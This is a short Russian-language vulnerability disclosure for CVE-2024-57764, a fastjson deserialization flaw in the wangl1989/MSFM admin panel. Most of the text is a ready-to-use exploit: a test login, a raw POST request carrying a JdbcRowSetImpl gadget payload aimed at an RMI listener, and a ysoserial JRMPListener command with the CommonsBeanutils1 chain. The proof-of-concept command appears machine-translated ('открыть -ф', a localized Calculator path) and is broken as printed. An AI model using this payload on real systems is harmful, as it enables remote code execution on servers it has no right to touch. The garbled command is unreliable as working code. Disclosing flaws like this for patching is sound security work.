Слияние кода завершено, страница обновится автоматически
CVE-2024-57764
Обнаружено лабораторией безопасности Chaitin Security Research Lab
Продукт с уязвимостью: wangl1989/MSFM
Версия продукта с уязвимостью: до 2025.01.01
Тип уязвимости: десериализация данных в fastjson
Детали уязвимости:
http://127.0.0.1:8083
Аккаунт: test/1
POST /admin/system/table/add HTTP/1.1
Host: 127.0.0.1:8083
Content-Type: application/json
Cookie: XXXXX
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/a","autoCommit":true}}
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 "открыть -ф /System/Applications/Калькулятор.app"
